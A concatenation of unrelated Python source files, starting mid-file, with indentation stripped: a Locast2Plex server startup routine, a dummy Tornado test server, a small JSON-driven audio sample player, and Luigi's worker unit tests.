'http://' + address + ':' + port + '/device.xml')
try:
ssdp.run()
except KeyboardInterrupt:
pass
################################### Startup Logic
if __name__ == '__main__':
# set to directory of script
os.chdir(os.path.dirname(os.path.abspath(__file__)))
LISTEN_ADDY = "0.0.0.0"
LISTEN_PORT = "6077"
CURRENT_VERSION = "0.4.2"
DEVICE_UUID = "12345678"
CONCURRENT_LISTENERS = 10
DEBUG_MODE = os.getenv('debug', False)
CONFIG_LOCAST_USERNAME = os.getenv('username', '')
CONFIG_LOCAST_PASSWORD = os.getenv('password', '')
HOST_PORT = os.getenv("external_port", '6077')
HOST_ADDY = os.getenv("external_addy", '0.0.0.0')
for argument in sys.argv:
if argument.startswith('-u:'):
CONFIG_LOCAST_USERNAME = argument[3:]
elif argument.startswith('-p:'):
CONFIG_LOCAST_PASSWORD = argument[3:]
elif argument.startswith('--debug'):
DEBUG_MODE = True
elif argument.startswith('--port:'):
HOST_PORT = argument[7:]
elif argument.startswith('--addy:'):
HOST_ADDY = argument[7:]
print("Locast2Plex v" + CURRENT_VERSION)
if DEBUG_MODE:
print("DEBUG MODE ACTIVE")
# generate UUID here for when we are not using docker
if not os.path.exists(os.path.curdir + '/service_uuid'):
print("No UUID found. Generating one now...")
# from https://pynative.com/python-generate-random-string/
# create a string that wouldn't be a real device uuid for
DEVICE_UUID = ''.join(random.choice("hijklmnopqrstuvwxyz") for i in range(8))
with open("service_uuid", 'w') as uuid_file:
uuid_file.write(DEVICE_UUID)
else:
print("UUID found.")
with open("service_uuid", 'r') as uuid_file:
DEVICE_UUID = uuid_file.read().replace('\n', '')
print("UUID set to: " + DEVICE_UUID + "...")
# check environment vars
if (CONFIG_LOCAST_USERNAME == ''):
print("Usernanme not specified. Exiting...")
exit()
if (CONFIG_LOCAST_PASSWORD == ''):
print("Password not specified. Exiting...")
exit()
# make sure we don't just let any value be set for this...
if (DEBUG_MODE != False):
DEBUG_MODE = True
ffmpeg_proc = None
mock_location = None
#mock_location = {
# "latitude": "47.6062",
# "longitude": "-122.3321"
#}
#
locast = LocastService.LocastService("./", mock_location)
station_list = None
if (not locast.login(CONFIG_LOCAST_USERNAME, CONFIG_LOCAST_PASSWORD)) or (not locast.validate_user()):
print("Exiting...")
clean_exit()
else:
station_list = locast.get_stations()
try:
print("Starting device server on " + LISTEN_ADDY + ":" + LISTEN_PORT)
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind((LISTEN_ADDY, int(LISTEN_PORT)))
serverSocket.listen(CONCURRENT_LISTENERS)
config = {
"host": (HOST_ADDY, HOST_PORT),
"listen": (LISTEN_ADDY, LISTEN_PORT),
"uuid": DEVICE_UUID
}
for i in range(CONCURRENT_LISTENERS):
PlexHttpServer(serverSocket, config, templates, station_list, locast)
print("Starting SSDP server...")
ssdpServer = Process(target=ssdpServerProcess, args=(HOST_ADDY, HOST_PORT, DEVICE_UUID))
ssdpServer.daemon = True
ssdpServer.start()
# wait forever
while True:
time.sleep(3600)
except KeyboardInterrupt:
print('^C received, shutting down the server')
clean_exit()
|
server.py
|
#!/usr/bin/env python
"""
Dummy server used for unit testing.
"""
from __future__ import print_function
import errno
import logging
import os
import random
import string
import sys
import threading
import socket
from tornado.platform.auto import set_close_exec
import tornado.wsgi
import tornado.httpserver
import tornado.ioloop
import tornado.web
log = logging.getLogger(__name__)
CERTS_PATH = os.path.join(os.path.dirname(__file__), 'certs')
DEFAULT_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.crt'),
'keyfile': os.path.join(CERTS_PATH, 'server.key'),
}
DEFAULT_CA = os.path.join(CERTS_PATH, 'cacert.pem')
DEFAULT_CA_BAD = os.path.join(CERTS_PATH, 'client_bad.pem')
# Different types of servers we have:
class SocketServerThread(threading.Thread):
"""
:param socket_handler: Callable which receives a socket argument for one
request.
:param ready_event: Event which gets set when the socket handler is
ready to receive requests.
"""
def __init__(self, socket_handler, host='localhost', port=8081,
ready_event=None):
threading.Thread.__init__(self)
self.socket_handler = socket_handler
self.host = host
self.ready_event = ready_event
def _start_server(self):
sock = socket.socket(socket.AF_INET6)
if sys.platform != 'win32':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.host, 0))
self.port = sock.getsockname()[1]
# Once listen() returns, the server socket is ready
sock.listen(1)
if self.ready_event:
self.ready_event.set()
self.socket_handler(sock)
sock.close()
def run(self):
self.server = self._start_server()
# FIXME: there is a pull request patching bind_sockets in Tornado directly.
# If it gets merged and released we can drop this and use
# `tornado.netutil.bind_sockets` again.
# https://github.com/facebook/tornado/pull/977
def bind_sockets(port, address=None, family=socket.AF_UNSPEC, backlog=128,
flags=None):
"""Creates listening sockets bound to the given port and address.
Returns a list of socket objects (multiple sockets are returned if
the given address maps to multiple IP addresses, which is most common
for mixed IPv4 and IPv6 use).
Address may be either an IP address or hostname. If it's a hostname,
the server will listen on all IP addresses associated with the
name. Address may be an empty string or None to listen on all
available interfaces. Family may be set to either `socket.AF_INET`
or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
both will be used if available.
The ``backlog`` argument has the same meaning as for
`socket.listen() <socket.socket.listen>`.
``flags`` is a bitmask of AI_* flags to `~socket.getaddrinfo`, like
``socket.AI_PASSIVE | socket.AI_NUMERICHOST``.
"""
sockets = []
if address == "":
address = None
if not socket.has_ipv6 and family == socket.AF_UNSPEC:
# Python can be compiled with --disable-ipv6, which causes
# operations on AF_INET6 sockets to fail, but does not
# automatically exclude those results from getaddrinfo
# results.
# http://bugs.python.org/issue16208
family = socket.AF_INET
if flags is None:
flags = socket.AI_PASSIVE
binded_port = None
for res in set(socket.getaddrinfo(address, port, family,
socket.SOCK_STREAM, 0, flags)):
af, socktype, proto, canonname, sockaddr = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error as e:
if e.args[0] == errno.EAFNOSUPPORT:
continue
raise
set_close_exec(sock.fileno())
if os.name != 'nt':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if af == socket.AF_INET6:
# On linux, ipv6 sockets accept ipv4 too by default,
# but this makes it impossible to bind to both
# 0.0.0.0 in ipv4 and :: in ipv6. On other systems,
# separate sockets *must* be used to listen for both ipv4
# and ipv6. For consistency, always disable ipv4 on our
# ipv6 sockets and use a separate ipv4 socket when needed.
#
# Python 2.x on windows doesn't have IPPROTO_IPV6.
if hasattr(socket, "IPPROTO_IPV6"):
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
# automatic port allocation with port=None
# should bind on the same port on IPv4 and IPv6
host, requested_port = sockaddr[:2]
if requested_port == 0 and binded_port is not None:
sockaddr = tuple([host, binded_port] + list(sockaddr[2:]))
sock.setblocking(0)
sock.bind(sockaddr)
binded_port = sock.getsockname()[1]
sock.listen(backlog)
sockets.append(sock)
return sockets
def run_tornado_app(app, io_loop, certs, scheme, host):
if scheme == 'https':
http_server = tornado.httpserver.HTTPServer(app, ssl_options=certs,
io_loop=io_loop)
else:
http_server = tornado.httpserver.HTTPServer(app, io_loop=io_loop)
sockets = bind_sockets(None, address=host)
port = sockets[0].getsockname()[1]
http_server.add_sockets(sockets)
return http_server, port
def run_loop_in_thread(io_loop):
t = threading.Thread(target=io_loop.start)
t.start()
return t
def get_unreachable_address():
while True:
host = ''.join(random.choice(string.ascii_lowercase)
for _ in range(60))
sockaddr = (host, 54321)
# check if we are really "lucky" and hit an actual server
try:
s = socket.create_connection(sockaddr)
except socket.error:
return sockaddr
else:
s.close()
|
nplayer.py
|
import threading,time,traceback,json,sys,os
os.chdir(os.path.dirname(os.path.abspath(sys.argv[0]))) #switch to script directory
import child
def sanitize(path): #to prevent directory traversal
return path.replace("/","").replace("\\","")
mode = "" #parser for args: -d = debug mode, -p path = playerpath, file = file
debug = False
if sys.platform[0:3] == "win":
playerpath = os.path.abspath("./bin/windows/mpg123.exe")
else:
playerpath = os.path.abspath("./bin/unix/mpg123")
for param in sys.argv[1:]:
if mode == "-p":
playerpath = os.path.abspath(param)
mode = ""
else:
if param == "-p":
mode = "-p"
elif param == "-d":
debug = True
else:
file = os.path.abspath(param)
if debug:
print("Argv : " + str(sys.argv[1:]))
print("Debug : True")
print("Playerpath : " + str(playerpath))
print("File : " + file)
file_content = json.load(open(file,"r"))
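# song header: "tact" and "base" are tempo parameters used below to turn note
# type values into playback lengths (in frames); "includes" lists the sample
# packs that must be present under ./packs/.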
tact = file_content["header"]["tact"]
base = file_content["header"]["base"]
packdb = {}
for include in file_content["header"]["includes"]: #create pack database
try:
packdata = json.load(open("./packs/" + sanitize(include) + "/pack.json","r"))
packdb[include] = [packdata["samplerate"],os.path.abspath("./packs/" + sanitize(include)),sanitize(packdata["extension"])]
except:
sys.exit("Error: failed to include " + include)
if debug:
print("Packdb : " + str(packdb),end="\n\n")
for group in file_content["notes"]: #start playing notes
counter = 0
for sound in file_content["notes"][group]["sounds"]:
file = packdb[file_content["notes"][group]["packs"][counter]]
file = file[1] + "/" + sanitize(sound) + file[2]
frames = base * ((1/file_content["notes"][group]["types"][counter])/tact) * packdb[file_content["notes"][group]["packs"][counter]][0] #base * ((1/type)/tact) * samplerate = frames
if debug:
print("Playerpath : " + str(playerpath))
print("File : " + file)
print("Frames : " + str(frames),end="\n\n")
threading.Thread(target=child.run,daemon=True,args=(playerpath,file,frames/1000)).start() #play note with child
counter = counter + 1
if file_content["notes"][group]["wait"]:
if debug:
print("Wait : " + str(base * (1/sorted(file_content["notes"][group]["types"])[0]/tact)),end="\n\n\n")
time.sleep(float(base * (1/sorted(file_content["notes"][group]["types"])[0]/tact)))
counter = 0
while threading.active_count() > 1 and counter < 100: #exit after 10 seconds or with no threads
counter = counter + 1
if debug:
print("Threads : " + str(threading.active_count()-1))
print("Counter : " + str(counter))
time.sleep(0.1)
if counter >= 100:
print("Warning: terminated with " + str(threading.active_count()-1) + " threads remaining")
|
worker_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import functools
import logging
import os
import shutil
import signal
import tempfile
import threading
import time
import psutil
from helpers import (unittest, with_config, skipOnTravis, LuigiTestCase,
temporary_unloaded_module)
import luigi.notifications
import luigi.task_register
import luigi.worker
import mock
from luigi import ExternalTask, RemoteScheduler, Task, Event
from luigi.mock import MockTarget, MockFileSystem
from luigi.scheduler import Scheduler
from luigi.worker import Worker
from luigi.rpc import RPCError
from luigi import six
from luigi.cmdline import luigi_run
luigi.notifications.DEBUG = True
class DummyTask(Task):
def __init__(self, *args, **kwargs):
super(DummyTask, self).__init__(*args, **kwargs)
self.has_run = False
def complete(self):
return self.has_run
def run(self):
logging.debug("%s - setting has_run", self)
self.has_run = True
class DynamicDummyTask(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.p)
def run(self):
with self.output().open('w') as f:
f.write('Done!')
time.sleep(0.5) # so we can benchmark & see if parallelization works
class DynamicDummyTaskWithNamespace(DynamicDummyTask):
task_namespace = 'banana'
class DynamicRequires(Task):
p = luigi.Parameter()
use_banana_task = luigi.BoolParameter(default=False)
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'parent'))
def run(self):
if self.use_banana_task:
task_cls = DynamicDummyTaskWithNamespace
else:
task_cls = DynamicDummyTask
dummy_targets = yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5)]
dummy_targets += yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5, 7)]
with self.output().open('w') as f:
for i, d in enumerate(dummy_targets):
for line in d.open('r'):
print('%d: %s' % (i, line.strip()), file=f)
class DynamicRequiresOtherModule(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'baz'))
def run(self):
import other_module
other_target_foo = yield other_module.OtherModuleTask(os.path.join(self.p, 'foo')) # NOQA
other_target_bar = yield other_module.OtherModuleTask(os.path.join(self.p, 'bar')) # NOQA
with self.output().open('w') as f:
f.write('Done!')
class DummyErrorTask(Task):
retry_index = 0
def run(self):
self.retry_index += 1
raise Exception("Retry index is %s for %s" % (self.retry_index, self.task_family))
class WorkerTest(LuigiTestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.time = time.time
with Worker(scheduler=self.sch, worker_id='X') as w, Worker(scheduler=self.sch, worker_id='Y') as w2:
self.w = w
self.w2 = w2
super(WorkerTest, self).run(result)
if time.time != self.time:
time.time = self.time
def setTime(self, t):
time.time = lambda: t
def test_dep(self):
class A(Task):
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertTrue(a.has_run)
self.assertTrue(b.has_run)
def test_external_dep(self):
class A(ExternalTask):
def complete(self):
return False
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(A):
def requires(self):
return luigi.task.externalize(a)
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_legacy_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
a.run = NotImplemented
class B(A):
def requires(self):
return a
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_type_error_in_tracking_run_deprecated(self):
class A(Task):
num_runs = 0
def complete(self):
return False
def run(self, tracking_url_callback=None):
self.num_runs += 1
raise TypeError('bad type')
a = A()
self.assertTrue(self.w.add(a))
self.assertFalse(self.w.run())
# Should only run and fail once, not retry because of the type error
self.assertEqual(1, a.num_runs)
def test_tracking_url(self):
tracking_url = 'http://test_url.com/'
class A(Task):
has_run = False
def complete(self):
return self.has_run
def run(self):
self.set_tracking_url(tracking_url)
self.has_run = True
a = A()
self.assertTrue(self.w.add(a))
self.assertTrue(self.w.run())
tasks = self.sch.task_list('DONE', '')
self.assertEqual(1, len(tasks))
self.assertEqual(tracking_url, tasks[a.task_id]['tracking_url'])
def test_fail(self):
class CustomException(BaseException):
def __init__(self, msg):
self.msg = msg
class A(Task):
def run(self):
self.has_run = True
raise CustomException('bad things')
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertFalse(self.w.run())
self.assertTrue(a.has_run)
self.assertFalse(b.has_run)
def test_unknown_dep(self):
# see related test_remove_dep test (grep for it)
class A(ExternalTask):
def complete(self):
return False
class C(Task):
def complete(self):
return True
def get_b(dep):
class B(Task):
def requires(self):
return dep
def run(self):
self.has_run = True
def complete(self):
return False
b = B()
b.has_run = False
return b
b_a = get_b(A())
b_c = get_b(C())
self.assertTrue(self.w.add(b_a))
# So now another worker goes in and schedules C -> B
# This should remove the dep A -> B but will screw up the first worker
self.assertTrue(self.w2.add(b_c))
self.assertFalse(self.w.run()) # should not run anything - the worker should detect that A is broken
self.assertFalse(b_a.has_run)
# not sure what should happen??
# self.w2.run() # should run B since C is fulfilled
# self.assertTrue(b_c.has_run)
def test_unfulfilled_dep(self):
class A(Task):
def complete(self):
return self.done
def run(self):
self.done = True
def get_b(a):
class B(A):
def requires(self):
return a
b = B()
b.done = False
a.done = True
return b
a = A()
b = get_b(a)
self.assertTrue(self.w.add(b))
a.done = False
self.w.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_gets_missed_work(self):
class A(Task):
done = False
def complete(self):
return self.done
def run(self):
self.done = True
a = A()
self.assertTrue(self.w.add(a))
# simulate a missed get_work response
self.assertEqual(a.task_id, self.sch.get_work(worker='X')['task_id'])
self.assertTrue(self.w.run())
self.assertTrue(a.complete())
def test_avoid_infinite_reschedule(self):
class A(Task):
def complete(self):
return False
class B(Task):
def complete(self):
return False
def requires(self):
return A()
self.assertTrue(self.w.add(B()))
self.assertFalse(self.w.run())
def test_fails_registering_signal(self):
with mock.patch('luigi.worker.signal', spec=['signal']):
# mock will raise an attribute error getting signal.SIGUSR1
Worker()
def test_allow_reschedule_with_many_missing_deps(self):
class A(Task):
""" Task that must run twice to succeed """
i = luigi.IntParameter()
runs = 0
def complete(self):
return self.runs >= 2
def run(self):
self.runs += 1
class B(Task):
done = False
def requires(self):
return map(A, range(20))
def complete(self):
return self.done
def run(self):
self.done = True
b = B()
w = Worker(scheduler=self.sch, worker_id='X', max_reschedules=1)
self.assertTrue(w.add(b))
self.assertFalse(w.run())
# For b to be done, we must have rescheduled its dependencies to run them twice
self.assertTrue(b.complete())
self.assertTrue(all(a.complete() for a in b.deps()))
def test_interleaved_workers(self):
class A(DummyTask):
pass
a = A()
class B(DummyTask):
def requires(self):
return a
class ExternalB(ExternalTask):
task_family = "B"
def complete(self):
return False
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(eb))
logging.debug("RUNNING BROKEN WORKER")
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
logging.debug("RUNNING FUNCTIONAL WORKER")
self.assertTrue(w.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_interleaved_workers2(self):
# two tasks without dependencies, one external, one not
class B(DummyTask):
pass
class ExternalB(ExternalTask):
task_family = "B"
def complete(self):
return False
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w2.add(eb))
self.assertTrue(w.add(b))
self.assertTrue(w2.run())
self.assertFalse(b.complete())
self.assertTrue(w.run())
self.assertTrue(b.complete())
def test_interleaved_workers3(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1) as w2:
self.assertTrue(w.add(a))
self.assertTrue(w2.add(b))
threading.Thread(target=w.run).start()
self.assertTrue(w2.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_die_for_non_unique_pending(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1) as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(b))
self.assertEqual(w._get_work()[0], a.task_id)
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
def test_complete_exception(self):
"Tests that a task is still scheduled if its sister task crashes in the complete() method"
class A(DummyTask):
def complete(self):
raise Exception("doh")
a = A()
class C(DummyTask):
pass
c = C()
class B(DummyTask):
def requires(self):
return a, c
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertFalse(a.has_run)
def test_requires_exception(self):
class A(DummyTask):
def requires(self):
raise Exception("doh")
a = A()
class D(DummyTask):
pass
d = D()
class C(DummyTask):
def requires(self):
return d
c = C()
class B(DummyTask):
def requires(self):
return c, a
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertTrue(d.has_run)
self.assertFalse(a.has_run)
def test_run_csv_batch_job(self):
completed = set()
class CsvBatchJob(luigi.Task):
values = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
def run(self):
completed.update(self.values.split(','))
self.has_run = True
def complete(self):
return all(value in completed for value in self.values.split(','))
tasks = [CsvBatchJob(str(i)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertFalse(task.has_run)
def test_run_max_batch_job(self):
completed = set()
class MaxBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return any(self.value <= ran for ran in completed)
tasks = [MaxBatchJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
def test_run_batch_job_unbatched(self):
completed = set()
class MaxNonBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
batchable = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return self.value in completed
tasks = [MaxNonBatchJob((i,)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertTrue(task.has_run)
def test_run_batch_job_limit_batch_size(self):
completed = set()
runs = []
class CsvLimitedBatchJob(luigi.Task):
value = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
max_batch_size = 4
def run(self):
completed.update(self.value.split(','))
runs.append(self)
def complete(self):
return all(value in completed for value in self.value.split(','))
tasks = [CsvLimitedBatchJob(str(i)) for i in range(11)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertEqual(3, len(runs))
def test_fail_max_batch_job(self):
class MaxBatchFailJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
self.has_run = True
assert False
def complete(self):
return False
tasks = [MaxBatchFailJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
for task in tasks:
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
self.assertEqual({task.task_id for task in tasks}, set(self.sch.task_list('FAILED', '')))
def test_gracefully_handle_batch_method_failure(self):
class BadBatchMethodTask(DummyTask):
priority = 10
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
bad_tasks = [BadBatchMethodTask(i) for i in range(5)]
good_tasks = [DummyTask()]
all_tasks = good_tasks + bad_tasks
self.assertFalse(any(task.complete() for task in all_tasks))
worker = Worker(scheduler=self.sch, keep_alive=True)
for task in all_tasks:
self.assertTrue(worker.add(task))
self.assertFalse(worker.run())
self.assertFalse(any(task.complete() for task in bad_tasks))
# we only get to run the good task if the bad task failures were handled gracefully
self.assertTrue(all(task.complete() for task in good_tasks))
def test_post_error_message_for_failed_batch_methods(self):
class BadBatchMethodTask(DummyTask):
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
tasks = [BadBatchMethodTask(1), BadBatchMethodTask(2)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
failed_ids = set(self.sch.task_list('FAILED', ''))
self.assertEqual({task.task_id for task in tasks}, failed_ids)
self.assertTrue(all(self.sch.fetch_error(task_id)['error'] for task_id in failed_ids))
class WorkerKeepAliveTests(LuigiTestCase):
def setUp(self):
self.sch = Scheduler()
super(WorkerKeepAliveTests, self).setUp()
def _worker_keep_alive_test(self, first_should_live, second_should_live, **worker_args):
worker_args.update({
'scheduler': self.sch,
'worker_processes': 0,
'wait_interval': 0.01,
'wait_jitter': 0.0,
})
w1 = Worker(worker_id='w1', **worker_args)
w2 = Worker(worker_id='w2', **worker_args)
with w1 as worker1, w2 as worker2:
worker1.add(DummyTask())
t1 = threading.Thread(target=worker1.run)
t1.start()
worker2.add(DummyTask())
t2 = threading.Thread(target=worker2.run)
t2.start()
# allow workers to run their get work loops a few times
time.sleep(0.1)
try:
self.assertEqual(first_should_live, t1.isAlive())
self.assertEqual(second_should_live, t2.isAlive())
finally:
# mark the task done so the worker threads will die
self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status='DONE')
t1.join()
t2.join()
def test_no_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
)
def test_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=True,
second_should_live=True,
keep_alive=True,
)
def test_keep_alive_count_uniques(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
keep_alive=True,
count_uniques=True,
)
def test_keep_alive_count_last_scheduled(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=True,
keep_alive=True,
count_last_scheduled=True,
)
class WorkerInterruptedTest(unittest.TestCase):
def setUp(self):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
requiring_sigusr = unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
'signal.SIGUSR1 not found on this system')
def _test_stop_getting_new_work(self, worker):
d = DummyTask()
with worker:
worker.add(d) # For an assistant it's ok that other tasks add it
self.assertFalse(d.complete())
worker.handle_interrupt(signal.SIGUSR1, None)
worker.run()
self.assertFalse(d.complete())
@requiring_sigusr
def test_stop_getting_new_work(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch))
@requiring_sigusr
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=False, assistant=True))
@requiring_sigusr
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=True, assistant=True))
def test_existence_of_disabling_option(self):
# any code equivalent of `os.kill(os.getpid(), signal.SIGUSR1)`
# seems to give some sort of an "InvocationError"
Worker(no_install_shutdown_handler=True)
@with_config({"worker": {"no_install_shutdown_handler": "True"}})
def test_can_run_luigi_in_thread(self):
class A(DummyTask):
pass
task = A()
# Note that ``signal.signal(signal.SIGUSR1, fn)`` can only be called in the main thread.
# So if we do not disable the shutdown handler, this would fail.
t = threading.Thread(target=lambda: luigi.build([task], local_scheduler=True))
t.start()
t.join()
self.assertTrue(task.complete())
class WorkerDisabledTest(LuigiTestCase):
def make_sch(self):
return Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
def _test_stop_getting_new_work_build(self, sch, worker):
"""
I got motivated to create this test case when I saw that the
execution_summary crashed after my first attempted solution.
"""
class KillWorkerTask(luigi.Task):
did_actually_run = False
def run(self):
sch.disable_worker('my_worker_id')
KillWorkerTask.did_actually_run = True
class Factory(object):
def create_local_scheduler(self, *args, **kwargs):
return sch
def create_worker(self, *args, **kwargs):
return worker
luigi.build([KillWorkerTask()], worker_scheduler_factory=Factory(), local_scheduler=True)
self.assertTrue(KillWorkerTask.did_actually_run)
def _test_stop_getting_new_work_manual(self, sch, worker):
d = DummyTask()
with worker:
worker.add(d) # For an assistant it's ok that other tasks add it
self.assertFalse(d.complete())
sch.disable_worker('my_worker_id')
worker.run() # Note: Test could fail by hanging on this line
self.assertFalse(d.complete())
def _test_stop_getting_new_work(self, **worker_kwargs):
worker_kwargs['worker_id'] = 'my_worker_id'
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_manual(sch, Worker(**worker_kwargs))
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_build(sch, Worker(**worker_kwargs))
def test_stop_getting_new_work_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=False)
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(keep_alive=False, assistant=True)
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=True)
class DynamicDependenciesTest(unittest.TestCase):
n_workers = 1
timeout = float('inf')
def setUp(self):
self.p = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.p)
def test_dynamic_dependencies(self, use_banana_task=False):
t0 = time.time()
t = DynamicRequires(p=self.p, use_banana_task=use_banana_task)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
# loop through output and verify
with t.output().open('r') as f:
for i in range(7):
self.assertEqual(f.readline().strip(), '%d: Done!' % i)
self.assertTrue(time.time() - t0 < self.timeout)
def test_dynamic_dependencies_with_namespace(self):
self.test_dynamic_dependencies(use_banana_task=True)
